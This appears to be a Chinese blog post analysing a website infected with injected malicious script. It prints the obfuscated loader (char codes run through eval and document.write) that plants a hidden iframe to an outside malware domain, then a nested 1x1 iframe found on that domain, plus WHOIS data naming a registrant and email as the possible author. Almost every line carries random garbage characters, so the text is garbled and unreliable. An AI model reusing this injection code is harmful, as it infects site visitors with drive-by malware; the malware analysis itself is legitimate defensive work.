首发在我的博客里面,
Z(c
SM DJgM>&Y6, http://www.areway.cn/?p=175 C(v'7H{4cW ~y"R{-%uS !{CIP`P1 周末上线鸭子就Q我说他的站给挂了马,当时没太注意就直接打开了连接,截下了网页源码:
Zf}2c8Vc4 9&=%shOc+x <script>t=’60,105,102,114,97,109,101,
NR(rr. 32,115,114,99,61,104,116,116,112,58,47,47,
JUA%l 102,114,101,101,46,117,45,117,117,117,46,99,
#&IrCq+ 110,47,101,114,114,111,114,46,104,116,109,
%A~. NNbS 32,119,105,100,116,104,61,49,48,48,32,104,
xj U0& 101,105,103,104,116,61,48,62,60,47,105,102,
PSu]I?WF 114,97,109,101,62′;
K/C} t=eval(’String.fromCharCode(’+t+’)');document.write(t);</script>
_ymSo`IvR aC1 xt( <script>t=’60,105,102,114,97,109,101,32,115,
-u%o) ;B 114,99,61,104,116,116,112,58,47,47,102,114,
}0E@eL 101,101,46,117,45,117,117,117,46,99,110,47,
T+P{,,a/] 101,114,114,111,114,46,104,116,109,32,119,
c/bT5TIEWs 105,100,116,104,61,49,48,48,32,104,101,105,
]wV\=m?z& 103,104,116,61,48,62,60,47,105,102,114,97,
"gI-S[ 109,101,62′;t=eval(’String.fromCharCode(’+t+’)');
Ja*,ht(5 document.write(t);</script>
l2Py2ZI-b EB+4]MsD <html xmlns=”
XU}i<5 http://www.w3.org/1999/xhtml D&mPYxXL “>
1iR\M4?Frf <head>
F'{ T[MA <!– Published By Newasp.cc 2007-12-7-18:03:23 –>
jzDPn<WQ <meta http-equiv=”Content-Type” content=”text/html; charset=gb2312″ />
fy>3#`T- <title>首页 - 爱生活家庭网
6I=d0m.io 4xs>X7 上面有一段 script的十进制加密字段,里面的大概内容是,把所有的字符放在函数t里面,最后用doucment.write(t)来把字符串写在网页里面。
UVi9}zr 转换字符串后的大概内容是(谁点击后果自付):
>/C,1}p[ <script>t=’<iframe src=http://free.u-uuu.cn/error.htm width=………
`ZC -lAY ]nIVP 查询玉米u-uuu.cn的详细信息:
O>rz+8 T Domain Name: u-uuu.cn
2g)q
( ROID: 20070901s10001s64972306-cn
T^|6{ S\ Domain Status: ok
i0x[w>\- Registrant Organization: 王雷
x51p'bNy Registrant Name: 王雷
cru&nH*O^ Administrative Email:
czlovexs@126.com dXt@x8E Sponsoring Registrar: 北京万网志成科技有限公司
#CeWk$)m Name Server:ns.yovole.com
q}JP;p(# Name Server:ns1.yovole.com
UG}"OBg/ Registration Date: 2007-09-01 17:54
/WAOpf5 Expiration Date: 2008-09-01 17:54
) { "}bMf 最后PING了一下地址 都没有什么….
Sf`?j i2O$oHd 上虚拟机里面继续分析,IE里面打开上面的连接…查看源代码…..直接又有嵌套.
EJ:2]!O <iframe src=http://www.foafau.info/ms15.htm width=1 height=1></iframe>
,`ehR6b <script language=”javascript” src=”
=cR=E{20 http://count43.51yes.com/click.aspx?id=4333375720&logo=6″></script z*^vdi0 >
Z79Y$d>G<E 这个玉米应该有可能是木马作者的:
<